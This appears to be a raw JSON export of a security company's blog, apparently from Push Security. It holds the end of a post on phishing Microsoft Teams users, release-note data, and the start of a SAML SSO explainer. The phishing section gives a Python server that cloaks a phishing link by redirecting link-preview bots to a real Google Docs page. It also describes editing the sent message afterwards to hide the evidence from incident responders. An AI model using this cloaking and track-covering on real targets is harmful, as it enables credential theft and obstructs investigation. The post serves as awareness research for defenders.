perspective:",{"data":265038,"content":265042,"nodeType":312},{"target":265039},{"sys":265040},{"id":265041,"type":317,"linkType":318},"1Tv7cohtgUhXpYWiZdmw8J",[],{"data":265044,"content":265045,"nodeType":169},{},[265046],{"data":265047,"marks":265048,"value":265049,"nodeType":173},{},[],"Cleaning you tracks",{"data":265051,"content":265052,"nodeType":178},{},[265053],{"data":265054,"marks":265055,"value":265056,"nodeType":173},{},[],"Ok, so let’s say an attacker has either successfully phished the target user or perhaps now the user is suspicious and likely contacting security or IT. One of the great benefits of IM apps is you can generally edit and delete messages, which can be abused by an attacker.",{"data":265058,"content":265059,"nodeType":178},{},[265060],{"data":265061,"marks":265062,"value":265063,"nodeType":173},{},[],"As an attacker, I could make a tiny change to my message to replace the malicious link with the legitimate link I was spoofing for the link preview if I got the sense the target was getting suspicious. Then, if an incident responder comes to investigate, the malicious link is now gone and the message itself appears almost identical, covering my tracks. Other than being able to see the message has been edited, it’s no longer easy to see this was a phishing attack or where the phishing link pointed to. ",{"data":265065,"content":265066,"nodeType":178},{},[265067],{"data":265068,"marks":265069,"value":265070,"nodeType":173},{},[],"This is definitely a useful capability that isn’t usually possible with email phishing! See this minor change reflected below, making the original phishing message appear innocuous due to the replacement of the phishing URL with a legitimate URL. A careful observer will notice that the message appears almost identical to the original, only now the faded domain in the link preview shows docs.google.com, instead of our malicious domain, since the link has been edited.",{"data":265072,"content":265076,"nodeType":312},{"target":265073},{"sys":265074},{"id":265075,"type":317,"linkType":318},"7prJ4j2AdLrcKXOJQU5mPp",[],{"data":265078,"content":265079,"nodeType":169},{},[265080],{"data":265081,"marks":265082,"value":15539,"nodeType":173},{},[],{"data":265084,"content":265085,"nodeType":178},{},[265086],{"data":265087,"marks":265088,"value":265089,"nodeType":173},{},[],"We’ve covered a lot of ground here, showing the chaining of external user spoofing attacks with link preview spoofing and also how to cover your tracks afterwards. It’s worth taking a step back and considering the key impact points:",{"data":265091,"content":265092,"nodeType":250},{},[265093,265103,265113,265123],{"data":265094,"content":265095,"nodeType":254},{},[265096],{"data":265097,"content":265098,"nodeType":178},{},[265099],{"data":265100,"marks":265101,"value":265102,"nodeType":173},{},[],"IM apps like Teams are now external phishing and social engineering vectors, not just internal ones",{"data":265104,"content":265105,"nodeType":254},{},[265106],{"data":265107,"content":265108,"nodeType":178},{},[265109],{"data":265110,"marks":265111,"value":265112,"nodeType":173},{},[],"User spoofing can be used in novel ways to enhance social engineering that employees may not be familiar with",{"data":265114,"content":265115,"nodeType":254},{},[265116],{"data":265117,"content":265118,"nodeType":178},{},[265119],{"data":265120,"marks":265121,"value":265122,"nodeType":173},{},[],"Link spoofing techniques can make phishing links much harder to spot and so increase social engineering success",{"data":265124,"content":265125,"nodeType":254},{},[265126],{"data":265127,"content":265128,"nodeType":178},{},[265129],{"data":265130,"marks":265131,"value":265132,"nodeType":173},{},[],"Malicious Teams messages can be modified later to replace the phishing link to cover up the attack",{"data":265134,"content":265135,"nodeType":169},{},[265136],{"data":265137,"marks":265138,"value":40632,"nodeType":173},{},[],{"data":265140,"content":265141,"nodeType":178},{},[265142],{"data":265143,"marks":265144,"value":265145,"nodeType":173},{},[],"IM apps have become the default internal communication for most organizations now, but are now a common method of communication with external parties, as well. This means they’ll become a key battleground in both the initial access phase of compromises and the latter phases of lateral movement and persistence. ",{"data":265147,"content":265148,"nodeType":178},{},[265149],{"data":265150,"marks":265151,"value":265152,"nodeType":173},{},[],"This also means organizations reliant on traditional email security gateways and email-based phishing training are likely to see the effectiveness of these controls decrease if attacks shift to the IM apps.",{"data":265154,"content":265155,"nodeType":178},{},[265156],{"data":265157,"marks":265158,"value":265159,"nodeType":173},{},[],"In this article, we highlighted a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.",{"data":265161,"content":265164,"nodeType":312},{"target":265162},{"sys":265163},{"id":209109,"type":317,"linkType":318},[],{"data":265166,"content":265167,"nodeType":178},{},[265168],{"data":265169,"marks":265170,"value":37,"nodeType":173},{},[],{"entries":265172},{"inline":265173,"hyperlink":265174,"block":265181},[],[265175,265177],{"sys":265176,"__typename":1528,"title":252410,"slug":252411},{"id":236132},{"sys":265178,"__typename":1528,"title":265179,"slug":265180},{"id":264515},"Slack Attack: A phisher's guide to persistence and lateral movement","phishing-slack-persistence",[265182,265184,265192,265199,265205,265211,265216,265223,265228,265232,265238,265244,265249,265254],{"sys":265183,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":265185,"__typename":5345,"title":265186,"caption":265187,"layoutMode":118,"file":265188},{"id":264773},"Teams invite from an external user","Teams invite from an external user with an attacker chosen username",{"url":265189,"width":265190,"height":265191},"https://images.ctfassets.net/y1cdw1ablpvd/41BM40X0zR7GLT9augEWse/20c8c47ae602252dc5ad04f03dbd5791/Teams_invite_from_an_external_user.png",677,611,{"sys":265193,"__typename":5345,"title":265194,"caption":265194,"layoutMode":118,"file":265195},{"id":264779},"Rendering of the attacker chosen name from an external user",{"url":265196,"width":265197,"height":265198},"https://images.ctfassets.net/y1cdw1ablpvd/Ea6mrq6bzXvD3RcD63kWR/a2bdd1fe10a412d5bb4a50792900958a/Rendering_of_the_attacker_chosen_name.png",584,147,{"sys":265200,"__typename":5345,"title":265201,"caption":265201,"layoutMode":118,"file":265202},{"id":264799},"Teams invite from a user from an external Teams organization - note email shows",{"url":265203,"width":265204,"height":173206},"https://images.ctfassets.net/y1cdw1ablpvd/vM7Bwt93lImxESrXbILv7/6dfe4d01f9025e5eea207b8905e01d1b/Teams_invite_from_a_user_from_an_external_Teams_organization.png",804,{"sys":265206,"__typename":5345,"title":265207,"caption":265207,"layoutMode":118,"file":265208},{"id":264893},"Link forging shows the real domain on a hover-over, but is otherwise permitted",{"url":265209,"width":86957,"height":265210},"https://images.ctfassets.net/y1cdw1ablpvd/6ggeHuKDrHgIpQetUprgHq/5e89fe2a3340810730411617fca737f6/Link_forging_shows_the_real_domain_on_a_hover-over.png",134,{"sys":265212,"__typename":5345,"title":265213,"caption":265213,"layoutMode":118,"file":265214},{"id":264906},"A hover-over still shows the true URL with a friendly text link",{"url":265215,"width":86957,"height":265210},"https://images.ctfassets.net/y1cdw1ablpvd/3mCc91OKYETyhLSOFiTd3W/bec7b7cc4bdbcd5d7bb31e6917916f38/A_hover_over_friendly_text_link.png",{"sys":265217,"__typename":5345,"title":265218,"caption":265218,"layoutMode":118,"file":265219},{"id":264926},"Link unfurling resulting in a helpful link preview ",{"url":265220,"width":265221,"height":265222},"https://images.ctfassets.net/y1cdw1ablpvd/CG1C7iH9rbdOma5CqoE0D/347d201afe66a89e1494f75f5bb20be8/unfurling.png",554,183,{"sys":265224,"__typename":134274,"name":265225,"type":265226,"syntax":265227},{"id":264961},"Blog > Code > Phishing Microsoft Teams for initial access #1","markup","User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com",{"sys":265229,"__typename":134274,"name":265230,"type":170053,"syntax":265231},{"id":264974},"Blog > Code > Phishing Microsoft Teams for initial access #2","from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass MyHandler(SimpleHTTPRequestHandler):\n    def do_GET(self):\n        for header, val in self.headers.items():\n            if header == \"User-Agent\":\n                print(header, val)\n                if val.startswith(\"Slackbot-LinkExpanding\") or \"SkypeUriPreview\" in val or \"Google-PageRenderer\" in val:\n                    self.send_response(301)\n                    self.send_header('Location', 'https://docs.google.com/presentation/d/1JsjD2Ro9KaHmW2vILPKJ6-7ptW89pfsAReyzCxQdpq0/edit?usp=sharing')\n                    self.end_headers()\n                    return\n            print(header, val)\n        return super(MyHandler, self).do_GET()\n\n\nhttpd = HTTPServer(('localhost', 8000), MyHandler)\nhttpd.serve_forever()\n",{"sys":265233,"__typename":5345,"title":265234,"caption":265234,"layoutMode":118,"file":265235},{"id":265015},"Phishing message making use of user spoofing and link preview spoofing to make the link seem legitimate",{"url":265236,"width":129849,"height":265237},"https://images.ctfassets.net/y1cdw1ablpvd/2HZqHpcwUFOaOSaeUbk1rx/119597868eaee6982e3f5510e2ed8caa/Phishing_message.png",205,{"sys":265239,"__typename":5345,"title":265240,"caption":265240,"layoutMode":118,"file":265241},{"id":265021},"The fake Google phishing page the user is directed to when clicking the link, in this case hosted on a custom ngrok domain",{"url":265242,"width":265243,"height":29270},"https://images.ctfassets.net/y1cdw1ablpvd/5dueTUJMn1lFQa7mwIVFca/4bf1fd95291ea188bd740faadf2f4411/fake_Google_phishing_page.png",1718,{"sys":265245,"__typename":5345,"title":265246,"caption":118,"layoutMode":118,"file":265247},{"id":265041},"How this attack works from a data flow perspective",{"url":265248,"width":254288,"height":23880},"https://images.ctfassets.net/y1cdw1ablpvd/1oFP5nagW2OSROK6ckicc6/3af9c8d6662b3db9aac0769e353414df/Updated-Teams.png",{"sys":265250,"__typename":5345,"title":265251,"caption":265251,"layoutMode":118,"file":265252},{"id":265075},"An edited message to remove the malicious link and replace it with the same link used for spoofed link preview.",{"url":265253,"width":129849,"height":265237},"https://images.ctfassets.net/y1cdw1ablpvd/1a5WPjras9dNqxiw3Yrz8m/8ef6fa561ae343916eb9d5bf576dcb77/Phishing_message_edited.png",{"sys":265255,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"See more original research and technical content from Push","Follow us on LinkedIn","content:blog:phishing-microsoft-teams-for-initial-access.json","blog/phishing-microsoft-teams-for-initial-access.json","blog/phishing-microsoft-teams-for-initial-access",{"_path":265262,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":265263,"ogImage":118,"summary":265265,"title":252949,"subtitle":118,"metaTitle":265276,"synopsis":252950,"hashTags":118,"publishedDate":252951,"slug":252952,"tagsCollection":265277,"relatedBlogPostsCollection":265281,"authorsCollection":265485,"content":265489,"_id":265767,"_type":5439,"_source":5440,"_file":265768,"_stem":265769,"_extension":5439},"/blog/product-release-january-2024",{"id":252692,"publishedAt":265264},"2024-02-06T15:34:15.805Z",{"json":265266},{"data":265267,"content":265268,"nodeType":165},{},[265269],{"data":265270,"content":265271,"nodeType":178},{},[265272],{"data":265273,"marks":265274,"value":265275,"nodeType":173},{},[],"Push REST API and webhooks available in beta, view activity for all apps in your environment, easier cleanup of old or shared accounts, and SAML login detection","Push Security new product features for January 2024",{"items":265278},[265279],{"sys":265280,"name":18399},{"id":18398},{"items":265282},[265283],{"__typename":1528,"sys":265284,"content":265285,"title":253854,"synopsis":253855,"hashTags":118,"publishedDate":253856,"slug":253857,"tagsCollection":265477,"authorsCollection":265481},{"id":253640},{"json":265286},{"nodeType":165,"data":265287,"content":265288},{},[265289,265295,265325,265331,265344,265349,265366,265372,265385,265390,265407,265413,265426,265455,265461,265466,265471],{"nodeType":235,"data":265290,"content":265291},{},[265292],{"nodeType":173,"value":220348,"marks":265293,"data":265294},[],{},{"nodeType":250,"data":265296,"content":265297},{},[265298,265307,265316],{"nodeType":254,"data":265299,"content":265300},{},[265301],{"nodeType":178,"data":265302,"content":265303},{},[265304],{"nodeType":173,"value":253661,"marks":265305,"data":265306},[],{},{"nodeType":254,"data":265308,"content":265309},{},[265310],{"nodeType":178,"data":265311,"content":265312},{},[265313],{"nodeType":173,"value":253671,"marks":265314,"data":265315},[],{},{"nodeType":254,"data":265317,"content":265318},{},[265319],{"nodeType":178,"data":265320,"content":265321},{},[265322],{"nodeType":173,"value":253681,"marks":265323,"data":265324},[],{},{"nodeType":235,"data":265326,"content":265327},{},[265328],{"nodeType":173,"value":253688,"marks":265329,"data":265330},[],{},{"nodeType":178,"data":265332,"content":265333},{},[265334,265337,265341],{"nodeType":173,"value":253695,"marks":265335,"data":265336},[],{},{"nodeType":173,"value":253699,"marks":265338,"data":265340},[265339],{"type":370},{},{"nodeType":173,"value":253704,"marks":265342,"data":265343},[],{},{"nodeType":312,"data":265345,"content":265348},{"target":265346},{"sys":265347},{"id":253711,"type":317,"linkType":318},[],{"nodeType":178,"data":265350,"content":265351},{},[265352,265355,265363],{"nodeType":173,"value":37,"marks":265353,"data":265354},[],{},{"nodeType":1698,"data":265356,"content":265359},{"target":265357},{"sys":265358},{"id":248611,"type":317,"linkType":318},[265360],{"nodeType":173,"value":18605,"marks":265361,"data":265362},[],{},{"nodeType":173,"value":37,"marks":265364,"data":265365},[],{},{"nodeType":235,"data":265367,"content":265368},{},[265369],{"nodeType":173,"value":253734,"marks":265370,"data":265371},[],{},{"nodeType":178,"data":265373,"content":265374},{},[265375,265378,265382],{"nodeType":173,"value":253741,"marks":265376,"data":265377},[],{},{"nodeType":173,"value":253745,"marks":265379,"data":265381},[265380],{"type":370},{},{"nodeType":173,"value":253750,"marks":265383,"data":265384},[],{},{"nodeType":312,"data":265386,"content":265389},{"target":265387},{"sys":265388},{"id":253757,"type":317,"linkType":318},[],{"nodeType":178,"data":265391,"content":265392},{},[265393,265396,265404],{"nodeType":173,"value":37,"marks":265394,"data":265395},[],{},{"nodeType":1698,"data":265397,"content":265400},{"target":265398},{"sys":265399},{"id":253769,"type":317,"linkType":318},[265401],{"nodeType":173,"value":148770,"marks":265402,"data":265403},[],{},{"nodeType":173,"value":37,"marks":265405,"data":265406},[],{},{"nodeType":235,"data":265408,"content":265409},{},[265410],{"nodeType":173,"value":253681,"marks":265411,"data":265412},[],{},{"nodeType":178,"data":265414,"content":265415},{},[265416,265419,265423],{"nodeType":173,"value":156608,"marks":265417,"data":265418},[],{},{"nodeType":173,"value":71581,"marks":265420,"data":265422},[265421],{"type":370},{},{"nodeType":173,"value":253794,"marks":265424,"data":265425},[],{},{"nodeType":250,"data":265427,"content":265428},{},[265429,265442],{"nodeType":254,"data":265430,"content":265431},{},[265432],{"nodeType":178,"data":265433,"content":265434},{},[265435,265439],{"nodeType":173,"value":253807,"marks":265436,"data":265438},[265437],{"type":370},{},{"nodeType":173,"value":253812,"marks":265440,"data":265441},[],{},{"nodeType":254,"data":265443,"content":265444},{},[265445],{"nodeType":178,"data":265446,"content":265447},{},[265448,265452],{"nodeType":173,"value":253822,"marks":265449,"data":265451},[265450],{"type":370},{},{"nodeType":173,"value":253827,"marks":265453,"data":265454},[],{},{"nodeType":178,"data":265456,"content":265457},{},[265458],{"nodeType":173,"value":253834,"marks":265459,"data":265460},[],{},{"nodeType":312,"data":265462,"content":265465},{"target":265463},{"sys":265464},{"id":253841,"type":317,"linkType":318},[],{"nodeType":312,"data":265467,"content":265470},{"target":265468},{"sys":265469},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":265472,"content":265473},{},[265474],{"nodeType":173,"value":37,"marks":265475,"data":265476},[],{},{"items":265478},[265479],{"sys":265480,"name":18399},{"id":18398},{"items":265482},[265483],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":265484},{"url":19129},{"items":265486},[265487],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":265488},{"url":19129},{"json":265490,"links":265717},{"nodeType":165,"data":265491,"content":265492},{},[265493,265499,265538,265543,265549,265555,265568,265573,265589,265595,265608,265613,265630,265636,265653,265658,265675,265680,265686,265706,265711],{"nodeType":235,"data":265494,"content":265495},{},[265496],{"nodeType":173,"value":220348,"marks":265497,"data":265498},[],{},{"nodeType":250,"data":265500,"content":265501},{},[265502,265511,265520,265529],{"nodeType":254,"data":265503,"content":265504},{},[265505],{"nodeType":178,"data":265506,"content":265507},{},[265508],{"nodeType":173,"value":252713,"marks":265509,"data":265510},[],{},{"nodeType":254,"data":265512,"content":265513},{},[265514],{"nodeType":178,"data":265515,"content":265516},{},[265517],{"nodeType":173,"value":252723,"marks":265518,"data":265519},[],{},{"nodeType":254,"data":265521,"content":265522},{},[265523],{"nodeType":178,"data":265524,"content":265525},{},[265526],{"nodeType":173,"value":252733,"marks":265527,"data":265528},[],{},{"nodeType":254,"data":265530,"content":265531},{},[265532],{"nodeType":178,"data":265533,"content":265534},{},[265535],{"nodeType":173,"value":252743,"marks":265536,"data":265537},[],{},{"nodeType":312,"data":265539,"content":265542},{"target":265540},{"sys":265541},{"id":209109,"type":317,"linkType":318},[],{"nodeType":235,"data":265544,"content":265545},{},[265546],{"nodeType":173,"value":252755,"marks":265547,"data":265548},[],{},{"nodeType":178,"data":265550,"content":265551},{},[265552],{"nodeType":173,"value":252762,"marks":265553,"data":265554},[],{},{"nodeType":178,"data":265556,"content":265557},{},[265558,265561,265565],{"nodeType":173,"value":252769,"marks":265559,"data":265560},[],{},{"nodeType":173,"value":2789,"marks":265562,"data":265564},[265563],{"type":370},{},{"nodeType":173,"value":245443,"marks":265566,"data":265567},[],{},{"nodeType":312,"data":265569,"content":265572},{"target":265570},{"sys":265571},{"id":252783,"type":317,"linkType":318},[],{"nodeType":178,"data":265574,"content":265575},{},[265576,265579,265586],{"nodeType":173,"value":37,"marks":265577,"data":265578},[],{},{"nodeType":186,"data":265580,"content":265581},{"uri":183466},[265582],{"nodeType":173,"value":252795,"marks":265583,"data":265585},[265584],{"type":194},{},{"nodeType":173,"value":37,"marks":265587,"data":265588},[],{},{"nodeType":235,"data":265590,"content":265591},{},[265592],{"nodeType":173,"value":252806,"marks":265593,"data":265594},[],{},{"nodeType":178,"data":265596,"content":265597},{},[265598,265601,265605],{"nodeType":173,"value":252813,"marks":265599,"data":265600},[],{},{"nodeType":173,"value":71552,"marks":265602,"data":265604},[265603],{"type":370},{},{"nodeType":173,"value":252821,"marks":265606,"data":265607},[],{},{"nodeType":312,"data":265609,"content":265612},{"target":265610},{"sys":265611},{"id":252828,"type":317,"linkType":318},[],{"nodeType":178,"data":265614,"content":265615},{},[265616,265619,265627],{"nodeType":173,"value":37,"marks":265617,"data":265618},[],{},{"nodeType":1698,"data":265620,"content":265623},{"target":265621},{"sys":265622},{"id":148863,"type":317,"linkType":318},[265624],{"nodeType":173,"value":148770,"marks":265625,"data":265626},[],{},{"nodeType":173,"value":37,"marks":265628,"data":265629},[],{},{"nodeType":235,"data":265631,"content":265632},{},[265633],{"nodeType":173,"value":252733,"marks":265634,"data":265635},[],{},{"nodeType":178,"data":265637,"content":265638},{},[265639,265642,265650],{"nodeType":173,"value":252857,"marks":265640,"data":265641},[],{},{"nodeType":1698,"data":265643,"content":265646},{"target":265644},{"sys":265645},{"id":252864,"type":317,"linkType":318},[265647],{"nodeType":173,"value":252867,"marks":265648,"data":265649},[],{},{"nodeType":173,"value":252871,"marks":265651,"data":265652},[],{},{"nodeType":312,"data":265654,"content":265657},{"target":265655},{"sys":265656},{"id":252878,"type":317,"linkType":318},[],{"nodeType":178,"data":265659,"content":265660},{},[265661,265664,265672],{"nodeType":173,"value":148826,"marks":265662,"data":265663},[],{},{"nodeType":1698,"data":265665,"content":265668},{"target":265666},{"sys":265667},{"id":252890,"type":317,"linkType":318},[265669],{"nodeType":173,"value":252893,"marks":265670,"data":265671},[],{},{"nodeType":173,"value":252897,"marks":265673,"data":265674},[],{},{"nodeType":312,"data":265676,"content":265679},{"target":265677},{"sys":265678},{"id":252904,"type":317,"linkType":318},[],{"nodeType":235,"data":265681,"content":265682},{},[265683],{"nodeType":173,"value":252910,"marks":265684,"data":265685},[],{},{"nodeType":178,"data":265687,"content":265688},{},[265689,265692,265696,265699,265703],{"nodeType":173,"value":252917,"marks":265690,"data":265691},[],{},{"nodeType":173,"value":252921,"marks":265693,"data":265695},[265694],{"type":370},{},{"nodeType":173,"value":252926,"marks":265697,"data":265698},[],{},{"nodeType":173,"value":71581,"marks":265700,"data":265702},[265701],{"type":370},{},{"nodeType":173,"value":252934,"marks":265704,"data":265705},[],{},{"nodeType":312,"data":265707,"content":265710},{"target":265708},{"sys":265709},{"id":252941,"type":317,"linkType":318},[],{"nodeType":178,"data":265712,"content":265713},{},[265714],{"nodeType":173,"value":37,"marks":265715,"data":265716},[],{},{"entries":265718},{"inline":265719,"hyperlink":265720,"block":265733},[],[265721,265723,265728],{"sys":265722,"__typename":6655,"title":168022,"slug":168023,"articleId":168024},{"id":148863},{"sys":265724,"__typename":6655,"title":265725,"slug":265726,"articleId":265727},{"id":252864},"How do I remove account data that is old or unneeded?","how-do-i-remove-account-data-that-is-old-or-unneeded",10103,{"sys":265729,"__typename":6655,"title":265730,"slug":265731,"articleId":265732},{"id":252890},"How do I resolve a shared account finding?","how-do-i-resolve-a-shared-account-finding",10104,[265734,265736,265742,265748,265754,265760],{"sys":265735,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},{"sys":265737,"__typename":5345,"title":265738,"caption":118,"layoutMode":118,"file":265739},{"id":252783},"API settings demo gif - release notes - January 2024",{"url":265740,"width":39,"height":265741},"https://images.ctfassets.net/y1cdw1ablpvd/1Vbjpi7EuwAC0t9dTr65ab/e4db83c045e4f6aadfc2a6b19915c237/configure_api_settings.gif",390,{"sys":265743,"__typename":5345,"title":265744,"caption":118,"layoutMode":118,"file":265745},{"id":252828},"Other apps demo - release notes - January 2024",{"url":265746,"width":39,"height":265747},"https://images.ctfassets.net/y1cdw1ablpvd/3DAouOsQkUMq68Ypoy16VN/24a44239fcf73cf87f12e71b2b22cfe8/view_other_apps.gif",330,{"sys":265749,"__typename":5345,"title":265750,"caption":118,"layoutMode":118,"file":265751},{"id":252878},"Forget accounts bulk action - docs - View SaaS activity",{"url":265752,"width":57879,"height":265753},"https://images.ctfassets.net/y1cdw1ablpvd/3sKaRd4vt3JNp68HbwWjK4/1e6d46ea607a59285fa6e90b37857057/forget_accounts_bulkaction_20231219.png",435,{"sys":265755,"__typename":5345,"title":265756,"caption":118,"layoutMode":118,"file":265757},{"id":252904},"Resolve shared account - docs - View SaaS activity",{"url":265758,"width":265759,"height":125394},"https://images.ctfassets.net/y1cdw1ablpvd/MELCh8C03rkAQkqcCJVy9/fe6c8c2e9b7260609b69d8e192eea35a/shared_account_resolve_20231218.png",1199,{"sys":265761,"__typename":5345,"title":265762,"caption":118,"layoutMode":118,"file":265763},{"id":252941},"SAML login detection - release notes - January 2024",{"url":265764,"width":265765,"height":265766},"https://images.ctfassets.net/y1cdw1ablpvd/3N9VlT6uokJ5rD67lTBxny/c16cb791dd676fe70c346b8b036bb4b2/saml_detection_screenshot.png",1366,324,"content:blog:product-release-january-2024.json","blog/product-release-january-2024.json","blog/product-release-january-2024",{"_path":265771,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":265772,"ogImage":118,"summary":265775,"relatedBlogPostsCollection":265786,"title":265788,"subtitle":118,"metaTitle":265789,"synopsis":265785,"hashTags":118,"publishedDate":265790,"slug":265791,"tagsCollection":265792,"authorsCollection":265796,"content":265800,"_id":266394,"_type":5439,"_source":5440,"_file":266395,"_stem":266396,"_extension":5439},"/blog/what-is-saml-sso",{"id":265773,"publishedAt":265774},"6SGAsZoMH2WlEvYZJV3RgQ","2024-02-06T15:35:05.292Z",{"json":265776},{"data":265777,"content":265778,"nodeType":165},{},[265779],{"data":265780,"content":265781,"nodeType":178},{},[265782],{"data":265783,"marks":265784,"value":265785,"nodeType":173},{},[],"In this article, we'll explain what SAML SSO is, how it works, and clarify some common misconceptions.",{"items":265787},[],"What is SAML SSO?","SAML SSO Defined","2024-01-03T00:00:00.000Z","what-is-saml-sso",{"items":265793},[265794],{"sys":265795,"name":26137},{"id":26136},{"items":265797},[265798],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":265799},{"url":155985},{"json":265801,"links":266338},{"nodeType":165,"data":265802,"content":265803},{},[265804,265810,265817,265860,265867,265874,265881,265888,265895,265902,265965,265971,265978,265985,265990,265997,266004,266011,266018,266025,266032,266039,266045,266052,266059,266065,266072,266079,266085,266092,266099,266105,266112,266119,266126,266132,266139,266146,266152,266159,266166,266186,266216,266236,266256,266262,266269,266276,266283,266300,266306,266313,266320,266327,266332],{"nodeType":169,"data":265805,"content":265806},{},[265807],{"nodeType":173,"value":258287,"marks":265808,"data":265809},[],{},{"nodeType":178,"data":265811,"content":265812},{},[265813],{"nodeType":173,"value":265814,"marks":265815,"data":265816},"This article delves into the Security Assertion Markup Language, more commonly known as SAML – one of the most widely used single sign-on (SSO) methods. We’ll be covering:",[],{},{"nodeType":250,"data":265818,"content":265819},{},[265820,265830,265840,265850],{"nodeType":254,"data":265821,"content":265822},{},[265823],{"nodeType":178,"data":265824,"content":265825},{},[265826],{"nodeType":173,"value":265827,"marks":265828,"data":265829},"What is SAML",[],{},{"nodeType":254,"data":265831,"content":265832},{},[265833],{"nodeType":178,"data":265834,"content":265835},{},[265836],{"nodeType":173,"value":265837,"marks":265838,"data":265839},"How it’s used",[],{},{"nodeType":254,"data":265841,"content":265842},{},[265843],{"nodeType":178,"data":265844,"content":265845},{},[265846],{"nodeType":173,"value":265847,"marks":265848,"data":265849},"Technical details of its implementation, and ",[],{},{"nodeType":254,"data":265851,"content":265852},{},[265853],{"nodeType":178,"data":265854,"content":265855},{},[265856],{"nodeType":173,"value":265857,"marks":265858,"data":265859},"Security-related issues.",[],{},{"nodeType":169,"data":265861,"content":265862},{},[265863],{"nodeType":173,"value":265864,"marks":265865,"data":265866},"What is SAML?",[],{},{"nodeType":178,"data":265868,"content":265869},{},[265870],{"nodeType":173,"value":265871,"marks":265872,"data":265873},"Security assertion markup language (SAML) is an open standard for exchanging authentication and authorization data between an identity provider (eg. Microsoft 365, Google Workspace, Okta) and an application (the service provider or SP).",[],{},{"nodeType":178,"data":265875,"content":265876},{},[265877],{"nodeType":173,"value":265878,"marks":265879,"data":265880},"SAML is one of the most common and widely used protocols that enable single sign-on (SSO) for enterprise-level services and can be used in both authentication or authorization contexts by providing assertions to claims. In other words, SAML authentication can be used to affirm that a user has been authenticated by an identity provider. Assertions can also include (but are not limited to) group or role membership properties that determine what a user can access in an application.",[],{},{"nodeType":178,"data":265882,"content":265883},{},[265884],{"nodeType":173,"value":265885,"marks":265886,"data":265887},"As expected from SSO implementations, SAML provides the ability for administrators to manage a user’s access to an application from a central point. This makes onboarding and offboarding tasks simpler, and reduces the overall number of identities that need to be managed for users.",[],{},{"nodeType":169,"data":265889,"content":265890},{},[265891],{"nodeType":173,"value":265892,"marks":265893,"data":265894},"What happens during a SAML authentication flow?",[],{},{"nodeType":178,"data":265896,"content":265897},{},[265898],{"nodeType":173,"value":265899,"marks":265900,"data":265901},"Without getting into the deep technical details of SAML, below is a simplified version of what happens when a user initiates the logon process against an app that is configured for SAML authentication.",[],{},{"nodeType":246189,"data":265903,"content":265904},{},[265905,265915,265925,265935,265945,265955],{"nodeType":254,"data":265906,"content":265907},{},[265908],{"nodeType":178,"data":265909,"content":265910},{},[265911],{"nodeType":173,"value":265912,"marks":265913,"data":265914},"A user attempts to access a resource or app.",[],{},{"nodeType":254,"data":265916,"content":265917},{},[265918],{"nodeType":178,"data":265919,"content":265920},{},[265921],{"nodeType":173,"value":265922,"marks":265923,"data":265924},"They are redirected to the IdP with a SAML request.",[],{},{"nodeType":254,"data":265926,"content":265927},{},[265928],{"nodeType":178,"data":265929,"content":265930},{},[265931],{"nodeType":173,"value":265932,"marks":265933,"data":265934},"The SAML identity provider (IdP) authenticates the user.",[],{},{"nodeType":254,"data":265936,"content":265937},{},[265938],{"nodeType":178,"data":265939,"content":265940},{},[265941],{"nodeType":173,"value":265942,"marks":265943,"data":265944},"If authentication is successful, the IdP creates a SAML assertion that contains the requested attributes, such as the email address, group membership information, first name, and last name.",[],{},{"nodeType":254,"data":265946,"content":265947},{},[265948],{"nodeType":178,"data":265949,"content":265950},{},[265951],{"nodeType":173,"value":265952,"marks":265953,"data":265954},"The SAML assertion is returned to the SP, and is signed by the IdP with a certificate configured during the initial configuration.",[],{},{"nodeType":254,"data":265956,"content":265957},{},[265958],{"nodeType":178,"data":265959,"content":265960},{},[265961],{"nodeType":173,"value":265962,"marks":265963,"data":265964},"The SP verifies the response, and if it validates the signature, access is granted to the user based on the assertions.",[],{},{"nodeType":312,"data":265966,"content":265970},{"target":265967},{"sys":265968},{"id":265969,"type":317,"linkType":318},"5ykmN6GAPfzSjjJrNikLGo",[],{"nodeType":178,"data":265972,"content":265973},{},[265974],{"nodeType":173,"value":265975,"marks":265976,"data":265977},"An interesting side note: at no point does the IdP directly communicate with the SP; the user’s browser facilitates all actions by contacting the respective services and providing the requests, as well as the SAML response that ultimately grants the user access to the requested resources. ",[],{},{"nodeType":178,"data":265979,"content":265980},{},[265981],{"nodeType":173,"value":265982,"marks":265983,"data":265984},"An example where this could be useful, or potentially abused by internal employees or attackers, would be enabling a third party internet-based IdP to allow access to resources within your internal network.",[],{},{"nodeType":312,"data":265986,"content":265989},{"target":265987},{"sys":265988},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":265991,"content":265992},{},[265993],{"nodeType":173,"value":265994,"marks":265995,"data":265996},"SAML responses and assertions",[],{},{"nodeType":178,"data":265998,"content":265999},{},[266000],{"nodeType":173,"value":266001,"marks":266002,"data":266003},"The SAML response is what an app requires to verify before granting the user access, and is generated by the IdP when a user requests to access resources. During the initial SAML configuration setup performed on the IdP, the administrator would specify which attributes are to be included in the assertion portion of the response that is returned to the app.",[],{},{"nodeType":178,"data":266005,"content":266006},{},[266007],{"nodeType":173,"value":266008,"marks":266009,"data":266010},"One required attribute included in each SAML response is “Subject”, typically set to the email address of the user, and specifies which account the assertion is for. However, this can be set to reflect other values like User Principal Names (UPNs) or other unique strings, depending on the requirements.",[],{},{"nodeType":178,"data":266012,"content":266013},{},[266014],{"nodeType":173,"value":266015,"marks":266016,"data":266017},"Depending on the app, the list of attributes may vary significantly and is usually the first time where administrators may run into configuration issues, either by not including all required attributes or by incorrectly mapping attributes to 